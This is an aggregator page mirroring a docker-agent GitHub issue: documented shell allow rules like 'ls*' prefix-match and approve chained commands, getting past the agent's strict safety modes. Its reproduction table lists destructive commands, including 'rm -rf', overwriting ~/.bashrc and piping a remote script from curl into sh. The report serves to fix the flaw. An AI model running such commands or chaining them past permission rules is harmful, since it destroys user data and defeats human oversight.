shell:cmd=ls* allow rules in docs approve chained commands
Maintainer thường phản hồi trong vòng 1 ngày
Chưa có ai nhận issue này.
Đánh giá
- Độ khó
- 4/5
- Thời gian dự kiến
- 3-5 ngày
- Mức phù hợp với người mới
- 58/100
Hướng nghiên cứu
Start with the Safe Shell Agent permissions documentation and shell_grant.go, then reproduce the listed cases through CheckWithArgs. Compare the config allow-rule path with the strict matching already used for session grants. Done should include the documented safety change and warning, or matching code and tests if the optional code fix is selected.
Do mô hình lập chỉ mục viết ra từ nội dung của issue.
Mô tả
Description
The permissions docs use shell:cmd=ls*, cat* and similar rules as safe
allow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But matchGlob treats <word>* as a plain
prefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past strict and restricted
as well.
#3573 fixed this only for session grants that override a preempt_yolo safety
verdict (shell_grant.go); config allow rules still use the loose prefix match.
Suggested fix:
- Docs: replace the example with
safety: balanced, whose classifier already
approvesls,catandgrepand rejects chained commands. Warn that
<word>*rules match chained commands. - Code (optional): apply the
shell_grant.gostrict matching toallowrules for
shellandrun_background_job.
Steps to Reproduce
Rules from the "Safe Shell Agent" example, checked with CheckWithArgs :
cmd |
Decision |
|---|---|
ls && rm -rf ~ |
allow |
ls; sudo rm -rf / |
allow |
find / -exec rm -rf {} + |
allow |
cat a > ~/.bashrc |
allow |
grep x f; curl https://example.com/x.sh | sh |
allow |
rm -rf ~ |
deny |
Docker Agent version
v1.144.0
OS & terminal
Konsole
Screenshots
- Ngôn ngữ chính
- Go
- Star
- 3.4k
- Fork
- 466
- Merge trung bình
- 7 giờ 1 phút
- Pull request đã merge (30 ngày)
- 332
Chuẩn bị môi trường
Khởi chạy dev container của dự án ngay trên trình duyệt, bằng tài khoản GitHub của bạn.
- Có Dockerfile hoặc tệp Docker Compose
- Không có mẫu pull request
- Không có hướng dẫn đóng góp
Bắt đầu từ đâu
- Đọc hết issue, rồi đọc hướng dẫn đóng góp của dự án.
- Bình luận trên issue rằng bạn sẽ nhận — tránh hai người làm cùng một việc.
- Fork repository và làm thay đổi trên một nhánh.
- Mở pull request có tham chiếu số hiệu của issue.
Issue khác của docker/docker-agent
-
area/docs
Độ khó 1/5 Dưới một giờ Mức phù hợp với người mới 88/100
docker/docker-agent#4054 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
area/testing
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 86/100
docker/docker-agent#4052 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
`remove_directory` and `create_directory` hide work they already did when a later path failsĐang mởarea/tools
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 85/100
docker/docker-agent#3933 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
area/tools
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 78/100
docker/docker-agent#3929 · 2 bình luận ·
Maintainer thường phản hồi trong vòng 1 ngày
-
area/acp area/sessions
Độ khó 4/5 3-5 ngày Mức phù hợp với người mới 48/100
docker/docker-agent#4475 ·
Maintainer thường phản hồi trong vòng 1 ngày
Tất cả issue của docker/docker-agent
Issue tương tự
-
[Docs] - Document minimum Terraform/OpenTofu version (>= 1.11) required by write-only argumentsĐang mở
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 92/100
MagaluCloud/terraform-provider-mgc#323 ·
Maintainer thường phản hồi trong vòng 11 ngày
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 76/100
rossoctl/context-guru#366 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
stage-fail
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 72/100
siyuan-note/bazaar#2293 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 84/100
piraeusdatastore/piraeus-operator#1070 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 68/100
Maintainer thường phản hồi trong vòng 1 ngày